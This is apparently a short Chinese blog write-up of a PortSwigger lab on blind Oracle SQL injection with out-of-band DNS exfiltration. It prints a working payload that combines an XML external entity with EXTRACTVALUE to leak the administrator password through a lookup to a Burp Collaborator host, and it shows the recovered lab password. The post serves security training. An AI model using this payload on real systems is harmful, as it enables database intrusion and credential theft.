burpsuite靶场----SQL注入17----oracle之DNS外带

burpsuite靶场----SQL注入17----oracle之DNS外带

靶场地址

https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration

正式开始

payload模板:'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
1.获取到burpsuite默认的dns


2.将BURP-COLLABORATOR-SUBDOMAIN替换为自己获得的subdomain
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.86cqq9vs9yhbsyygo7t4lmjvqmwck1.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
3.成功

获取账号密码
administrator tiyq3pay84ugnxx5f5ig

posted @ 2023-08-18 19:34  BattleofZhongDinghe  阅读(66)  评论(0编辑  收藏  举报